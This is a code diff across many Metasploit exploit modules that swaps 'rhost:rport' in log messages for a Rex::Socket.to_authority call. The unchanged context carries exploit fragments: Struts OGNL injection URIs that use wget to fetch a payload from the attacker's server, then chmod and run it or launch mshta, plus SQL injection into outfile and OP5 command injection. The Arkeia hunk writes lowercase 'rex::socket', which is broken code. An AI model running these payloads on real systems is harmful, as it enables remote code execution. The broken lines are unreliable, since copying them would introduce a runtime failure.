+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Unable to connect"
       return nil
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return nil
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return nil
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication"
       return nil
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return nil
     end
 
@@ -163,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
       conn = do_login('support', key_data)
       next unless conn
 
-      print_good "#{rhost}:#{rport} - Successful login via support@#{rhost}:#{rport} and ssh key: #{key}"
+      print_good "#{Rex::Socket.to_authority(rhost, rport)} - Successful login via support@#{Rex::Socket.to_authority(rhost, rport)} and ssh key: #{key}"
       handler(conn.lsock)
       break if datastore['STOP_ON_SUCCESS']
     end

--- a/modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb
+++ b/modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
-    print_status("#{rhost}:#{rport} - Attempt to login to VyOS SSH ...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempt to login to VyOS SSH ...")
 
     begin
       ssh = nil

--- a/modules/exploits/multi/http/activecollab_chat.rb
+++ b/modules/exploits/multi/http/activecollab_chat.rb
@@ -105,9 +105,9 @@ class MetasploitModule < Msf::Exploit::Remote
         acsession = $1
       end
     elsif res and res.body =~ /Failed to log you in/
-      print_error("#{rhost}:#{rport} Could not login to the target application as #{user}:#{pass}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Could not login to the target application as #{user}:#{pass}")
     elsif res and res.code != 200 or res.code != 302
-      print_error("#{rhost}:#{rport} Server returned a failed status code: (#{res.code})")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Server returned a failed status code: (#{res.code})")
     end
 
     # injection

--- a/modules/exploits/multi/http/axis2_deployer.rb
+++ b/modules/exploits/multi/http/axis2_deployer.rb
@@ -243,7 +243,7 @@ class MetasploitModule < Msf::Exploit::Remote
         end
       end
     rescue ::Rex::ConnectionError
-      print_error("http://#{rhost}:#{rport}#{rpath}/(rest|services) Unable to authenticate (#{res.code} #{res.message})")
+      print_error("http://#{Rex::Socket.to_authority(rhost, rport)}#{rpath}/(rest|services) Unable to authenticate (#{res.code} #{res.message})")
     end
   end
 
@@ -265,11 +265,11 @@ class MetasploitModule < Msf::Exploit::Remote
       )
 
       if not (res.kind_of? Rex::Proto::Http::Response)
-        print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin not responding")
+        print_error("http://#{Rex::Socket.to_authority(rhost, rport)}#{rpath}/axis2-admin not responding")
       end
 
       if res.code == 404
-        print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin returned code 404")
+        print_error("http://#{Rex::Socket.to_authority(rhost, rport)}#{rpath}/axis2-admin returned code 404")
       end
 
       srvhdr = res.headers['Server']
@@ -284,7 +284,7 @@ class MetasploitModule < Msf::Exploit::Remote
         end
       end
     rescue ::Rex::ConnectionError
-      print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin Unable to attempt authentication")
+      print_error("http://#{Rex::Socket.to_authority(rhost, rport)}#{rpath}/axis2-admin Unable to attempt authentication")
     end
 
     if not success and not rpath =~ /dswsbobje/
@@ -300,11 +300,11 @@ class MetasploitModule < Msf::Exploit::Remote
         )
 
         if not (res.kind_of? Rex::Proto::Http::Response)
-          print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin not responding")
+          print_error("http://#{Rex::Socket.to_authority(rhost, rport)}#{rpath}/axis2-admin not responding")
         end
 
         if res.code == 404
-          print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin returned code 404")
+          print_error("http://#{Rex::Socket.to_authority(rhost, rport)}#{rpath}/axis2-admin returned code 404")
         end
 
         srvhdr = res.headers['Server']
@@ -319,15 +319,15 @@ class MetasploitModule < Msf::Exploit::Remote
           end
         end
       rescue ::Rex::ConnectionError
-        print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin Unable to attempt authentication")
+        print_error("http://#{Rex::Socket.to_authority(rhost, rport)}#{rpath}/axis2-admin Unable to attempt authentication")
       end
     end
 
     if success
-      print_good("http://#{rhost}:#{rport}#{rpath}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")
+      print_good("http://#{Rex::Socket.to_authority(rhost, rport)}#{rpath}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")
       upload_exec(session, rpath)
     else
-      print_error("http://#{rhost}:#{rport}#{rpath}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'")
+      print_error("http://#{Rex::Socket.to_authority(rhost, rport)}#{rpath}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'")
     end
   end
 end

--- a/modules/exploits/multi/http/bassmaster_js_injection.rb
+++ b/modules/exploits/multi/http/bassmaster_js_injection.rb
@@ -92,10 +92,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     if (not @pl)
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)
   end
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
     resource_uri = "\\x2f#{downfile}"
 
     @service_url = "http:\\x2f\\x2f#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{resource_uri}"
-    print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
     start_service({
       'Uri' => {
         'Proc' => Proc.new { |cli, req|

--- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb
+++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb
@@ -104,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Sending payload")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending payload")
 
     unlink = (target['Platform'] == 'linux') ? true : false
     p = no_php_tags(get_write_exec_payload(unlink_self: unlink))

--- a/modules/exploits/multi/http/freescout_htaccess_rce.rb
+++ b/modules/exploits/multi/http/freescout_htaccess_rce.rb
@@ -136,7 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
     marker = Rex::Text.rand_text_alphanumeric(16)
     @param = Rex::Text.rand_text_alpha(4)
     @cleanup_param = Rex::Text.rand_text_alpha(4)
-    print_status("Sending exploit email to #{datastore['MAILTO']} via #{rhost}:#{rport}")
+    print_status("Sending exploit email to #{datastore['MAILTO']} via #{Rex::Socket.to_authority(rhost, rport)}")
     send_message(build_email(marker))
     print_good('Exploit email sent')
 

--- a/modules/exploits/multi/http/hyperic_hq_script_console.rb
+++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb
@@ -291,7 +291,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Sending UNIX payload...")
       http_send_command(java_craft_runtime_exec(payload.encoded))
     when 'linux'
-      print_status("#{rhost}:#{rport} - Sending Linux stager...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending Linux stager...")
       linux_stager
     end
   end

--- a/modules/exploits/multi/http/invision_customcss_rce.rb
+++ b/modules/exploits/multi/http/invision_customcss_rce.rb
@@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'content' => expr
     }
 
-    print_status("Sending exploit to #{rhost}:#{rport} ...")
+    print_status("Sending exploit to #{Rex::Socket.to_authority(rhost, rport)} ...")
     send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'method' => 'POST',

--- a/modules/exploits/multi/http/jboss_seam_upload_exec.rb
+++ b/modules/exploits/multi/http/jboss_seam_upload_exec.rb
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    vprint_status("#{rhost}:#{rport} Checking for vulnerable JBoss Seam 2")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Checking for vulnerable JBoss Seam 2")
     uri = target_uri.path
     res = send_request_cgi(
       {
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_cmd(cmd)
     cmd_to_run = Rex::Text.uri_encode(cmd)
-    vprint_status("#{rhost}:#{rport} Sending command: #{cmd_to_run}")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Sending command: #{cmd_to_run}")
     uri = target_uri.path
     res = send_request_cgi(
       {
@@ -116,12 +116,12 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     if (res and res.code == 302 and res.headers['Location'])
       if (res.headers['Location'] =~ /user=java.lang.UNIXProcess/)
-        vprint_good("#{rhost}:#{rport} Exploit successful")
+        vprint_good("#{Rex::Socket.to_authority(rhost, rport)} Exploit successful")
       else
-        vprint_error("#{rhost}:#{rport} Exploit failed")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} Exploit failed")
       end
     else
-      vprint_error("#{rhost}:#{rport} Exploit failed")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} Exploit failed")
     end
   end
 
@@ -190,14 +190,14 @@ class MetasploitModule < Msf::Exploit::Remote
       # TODO: Including the conversationId part in this regex might cause
       # failure on other Seam applications.  Needs more testing
       if (res.headers['Location'] =~ /user=&conversationId/)
-        # vprint_status("#{rhost}:#{rport} Exploit successful.")
+        # vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Exploit successful.")
         return true
       else
-        # vprint_status("#{rhost}:#{rport} Exploit failed")
+        # vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Exploit failed")
         return false
       end
     else
-      # vprint_status("#{rhost}:#{rport} Exploit failed")
+      # vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Exploit failed")
       return false
     end
   end
@@ -273,8 +273,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       fname = datastore['FNAME'] || Rex::Text.rand_text_alpha(rand(8..15))
 
-      vprint_status("#{rhost}:#{rport} Host is vulnerable")
-      vprint_status("#{rhost}:#{rport} Uploading file...")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Host is vulnerable")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Uploading file...")
 
       # chunking code based on struts_code_exec_exception_delegator
       chunk_size = datastore['CHUNKSIZE']

--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -226,13 +226,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target['Platform']
     when 'win'
-      print_status("#{rhost}:#{rport} - Sending command stager...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending command stager...")
       execute_cmdstager({ linemax: 2049 })
     when 'unix'
-      print_status("#{rhost}:#{rport} - Sending payload...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending payload...")
       http_send_command(payload.encoded.to_s)
     when 'linux'
-      print_status("#{rhost}:#{rport} - Sending Linux stager...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending Linux stager...")
       execute_cmdstager({ linemax: 2049 })
     end
 

--- a/modules/exploits/multi/http/manageengine_search_sqli.rb
+++ b/modules/exploits/multi/http/manageengine_search_sqli.rb
@@ -87,10 +87,10 @@ class MetasploitModule < Msf::Exploit::Remote
     # Windows = 5.0.36-enterprise-nt
 
     if res and res.body =~ /\d\.\d\.\d\d-enterprise-nt/
-      print_status("#{rhost}:#{rport} - Target selected: #{targets[1].name}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Target selected: #{targets[1].name}")
       return targets[1] # Windows target
     elsif res and res.body =~ /\d\.\d\.\d\d-enterprise/
-      print_status("#{rhost}:#{rport} - Target selected: #{targets[2].name}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Target selected: #{targets[2].name}")
       return targets[2]
     end
 
@@ -209,11 +209,11 @@ class MetasploitModule < Msf::Exploit::Remote
     sqli << (2..28).map { |e| e } * ','
     sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
 
-    print_status("#{rhost}:#{rport} - Trying SQL injection...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying SQL injection...")
     sqli_exec(sqli)
 
     fname = "/#{File.basename(out)}"
-    print_status("#{rhost}:#{rport} - Requesting #{fname}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Requesting #{fname}")
     send_request_raw({ 'uri' => fname })
 
     handler
@@ -222,7 +222,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     @my_target = pick_target
     if @my_target.nil?
-      print_error("#{rhost}:#{rport} - Unable to select a target, we must bail.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to select a target, we must bail.")
       return
     end
 

--- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb
+++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb
@@ -119,11 +119,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     case target['Platform']
     when 'win'
-      print_status("#{rhost}:#{rport} - Sending command stager...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending command stager...")
       execute_cmdstager({ linemax: 500 })
 
     when 'unix'
-      print_status("#{rhost}:#{rport} - Sending payload...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending payload...")
       http_send_command(%(/bin/sh -c "#{payload.encoded}"))
     end
 

--- a/modules/exploits/multi/http/op5_license.rb
+++ b/modules/exploits/multi/http/op5_license.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...")
-    vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
+    vprint_status("Sending request to https://#{Rex::Socket.to_authority(rhost, rport)}#{datastore['URI']}")
 
     # Try running/timing 'ping localhost' to determine is system is vulnerable
     start = Time.now
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
+    print_status("Sending request to https://#{Rex::Socket.to_authority(rhost, rport)}#{datastore['URI']}")
 
     data = 'timestamp=1317050333`' + payload.encoded + '`&action=install&install=Install';
 

--- a/modules/exploits/multi/http/op5_welcome.rb
+++ b/modules/exploits/multi/http/op5_welcome.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...")
-    vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
+    vprint_status("Sending request to https://#{Rex::Socket.to_authority(rhost, rport)}#{datastore['URI']}")
 
     # Try running/timing 'ping localhost' to determine is system is vulnerable
     start = Time.now
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
+    print_status("Sending request to https://#{Rex::Socket.to_authority(rhost, rport)}#{datastore['URI']}")
 
     data = 'do=do=Login&password=`' + payload.encoded + '`';
 

--- a/modules/exploits/multi/http/orientdb_exec.rb
+++ b/modules/exploits/multi/http/orientdb_exec.rb
@@ -240,13 +240,13 @@ class MetasploitModule < Msf::Exploit::Remote
     # Exploit
     case target['Platform']
     when 'win'
-      print_status("#{rhost}:#{rport} - Sending command stager...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending command stager...")
       execute_cmdstager(flavor: :vbs)
     when 'unix'
-      print_status("#{rhost}:#{rport} - Sending payload...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending payload...")
       res = http_send_command("#{payload.encoded}", "#{targetdb}")
     when 'linux'
-      print_status("#{rhost}:#{rport} - Sending Linux stager...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending Linux stager...")
       linux_stager
     end
     handler

--- a/modules/exploits/multi/http/phptax_exec.rb
+++ b/modules/exploits/multi/http/phptax_exec.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     uri = target_uri.path
 
-    print_status("#{rhost}#{rport} - Sending request...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request...")
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(uri, "drawimage.php"),

--- a/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb
+++ b/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb
@@ -100,10 +100,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     if (not @pl)
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)
   end
@@ -163,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
     resource_uri = '/' + downfile
 
     @service_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{resource_uri}"
-    print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
     start_service({
       'Uri' => {
         'Proc' => Proc.new { |cli, req|

--- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
+++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
@@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def exploit
     [2, 3].each do |ver|
-      print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
+      print_status("Sending Railsv#{ver} request to #{Rex::Socket.to_authority(rhost, rport)}...")
       send_request_cgi({
         'uri' => normalize_uri(target_uri.path),
         'method' => datastore['HTTP_METHOD'],

--- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
+++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
@@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def exploit
     [2, 3].each do |ver|
-      print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
+      print_status("Sending Railsv#{ver} request to #{Rex::Socket.to_authority(rhost, rport)}...")
       send_request_cgi({
         'uri' => datastore['URIPATH'] || "/",
         'method' => datastore['HTTP_METHOD'],

--- a/modules/exploits/multi/http/spip_connect_exec.rb
+++ b/modules/exploits/multi/http/spip_connect_exec.rb
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     uri = normalize_uri(target_uri.path, 'spip.php')
-    print_status("#{rhost}:#{rport} - Attempting to exploit...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempting to exploit...")
 
     phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
 

--- a/modules/exploits/multi/http/spip_rce_form.rb
+++ b/modules/exploits/multi/http/spip_rce_form.rb
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_status("Got anti-csrf token: #{csrf}")
-    print_status("#{rhost}:#{rport} - Attempting to exploit...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempting to exploit...")
 
     phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
     final_payload = "<?php #{phped_payload} ?>"

--- a/modules/exploits/multi/http/struts_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_default_action_mapper.rb
@@ -119,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def start_http_service
-    print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/...")
     start_service({
       'Uri' => {
         'Proc' => proc do |cli, req|
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res.nil? or res.code != 200
-      vprint_error("#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Check needs a valid action, returning 200, as TARGETURI")
       return Exploit::CheckCode::Unknown('No response received from the target')
     end
 
@@ -207,7 +207,7 @@ class MetasploitModule < Msf::Exploit::Remote
     uri = normalize_uri(target_uri.path)
     uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(%r{/}, '$')}').replace('$','\\u002f')})).start()}"
 
-    print_status("#{rhost}:#{rport} - Downloading payload to #{fname}...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Downloading payload to #{fname}...")
 
     res = send_request_cgi({
       'method' => 'GET',
@@ -231,7 +231,7 @@ class MetasploitModule < Msf::Exploit::Remote
     uri = normalize_uri(target_uri.path)
     uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(%r{/}, '$')}').replace('$','\\u002f')})).start()}"
 
-    print_status("#{rhost}:#{rport} - Make payload executable...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Make payload executable...")
 
     res = send_request_cgi({
       'method' => 'GET',
@@ -248,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Remote
     uri = normalize_uri(target_uri.path)
     uri << "?redirect:%24{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(%r{/}, '$')}').replace('$','\\u002f'))).start()}"
 
-    print_status("#{rhost}:#{rport} - Execute payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Execute payload...")
 
     res = send_request_cgi({
       'method' => 'GET',
@@ -276,7 +276,7 @@ class MetasploitModule < Msf::Exploit::Remote
     uri = normalize_uri(target_uri.path)
     uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\u002f')})).start()}"
 
-    print_status("#{rhost}:#{rport} - Execute payload through malicious HTA...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Execute payload through malicious HTA...")
 
     res = send_request_cgi({
       'method' => 'GET',
@@ -297,9 +297,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     if target.name =~ /Automatic/
-      print_status("#{rhost}:#{rport} - Target autodetection...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Target autodetection...")
       my_target = auto_target
-      print_good("#{rhost}:#{rport} - #{my_target.name} target found!")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - #{my_target.name} target found!")
     else
       my_target = target
     end
@@ -322,12 +322,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Handle incoming requests from the server
   def on_request_uri(cli, request)
-    vprint_status("#{rhost}:#{rport} - URI requested: #{request.inspect}")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - URI requested: #{request.inspect}")
     if (!@pl)
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...")
     @pl_sent = true
     send_response(cli, @pl)
   end
@@ -338,7 +338,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # wait for the data to be sent
   def wait_payload
-    print_status("#{rhost}:#{rport} - Waiting for the victim to request the payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting for the victim to request the payload...")
 
     waited = 0
     until (@pl_sent)
@@ -367,7 +367,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Doing in this way to bypass the ADODB.Stream restrictions on JS,
     # even when executing it as an "HTA" application
     # The encoding code has been stolen from ie_unsafe_scripting.rb
-    print_status("#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Encoding payload into vbs/javascript/hta...")
 
     # Build the content that will end up in the .vbs file
     vbs_content	= Rex::Text.to_hex(%|

--- a/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb
+++ b/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb
@@ -142,10 +142,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     if (not @pl)
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)
   end
@@ -159,7 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @service_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{resource_uri}"
 
-    print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
     start_service({
       'Uri' => {
         'Proc' => Proc.new { |cli, req|

--- a/modules/exploits/multi/http/vbulletin_replace_ad_template_rce.rb
+++ b/modules/exploits/multi/http/vbulletin_replace_ad_template_rce.rb
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    vprint_status("Starting vulnerability check on #{rhost}:#{rport}#{target_uri.path}")
+    vprint_status("Starting vulnerability check on #{Rex::Socket.to_authority(rhost, rport)}#{target_uri.path}")
     inject_and_trigger(:check) ? CheckCode::Vulnerable('Successfully executed the injected code') : CheckCode::Safe('The target is not vulnerable')
   end
 

--- a/modules/exploits/multi/ids/snort_dce_rpc.rb
+++ b/modules/exploits/multi/ids/snort_dce_rpc.rb
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     p = buildpacket(shost, rhost, rport.to_i)
 
-    print_status("#{rhost}:#{rport} Sending crafted SMB packet from #{shost}...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} Sending crafted SMB packet from #{shost}...")
 
     return unless capture_sendto(p, rhost)
 

--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -305,14 +305,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if data =~ /VERSION.*WD Arkeia ([0-9]+\.[0-9]+\.[0-9]+)/
       version = $1
-      vprint_status("#{rhost}:#{rport} - Arkeia version detected: #{version}")
+      vprint_status("#{rex::socket.to_authority(rhost, rport)} - Arkeia version detected: #{version}")
       if Rex::Version.new(version) <= Rex::Version.new('11.0.12')
         return Exploit::CheckCode::Appears("Arkeia version #{version} is vulnerable")
       else
         return Exploit::CheckCode::Safe("Arkeia version #{version} is not vulnerable")
       end
     else
-      vprint_status("#{rhost}:#{rport} - Arkeia version not detected")
+      vprint_status("#{rex::socket.to_authority(rhost, rport)} - Arkeia version not detected")
       return Exploit::CheckCode::Unknown('Could not determine the version')
     end
   end
@@ -346,11 +346,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def communicate(command)
-    print_status("#{rhost}:#{rport} - Connecting to Arkeia daemon")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Connecting to Arkeia daemon")
 
     connect
 
-    print_status("#{rhost}:#{rport} - Sending agent communication")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Sending agent communication")
 
     req = "\x00\x41\x00\x00\x00\x00\x00\x70"
     req << "\x00" * 12
@@ -371,14 +371,14 @@ class MetasploitModule < Msf::Exploit::Remote
     header = sock.get_once(6)
     unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet identifier")
     end
 
     data_length = sock.get_once(2)
 
     unless data_length && data_length.length == 2
       disconnect
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+      fail_with(Failure::Unknown, "#{rex::socket.to_authority(rhost, rport)} - Failure reading packet length")
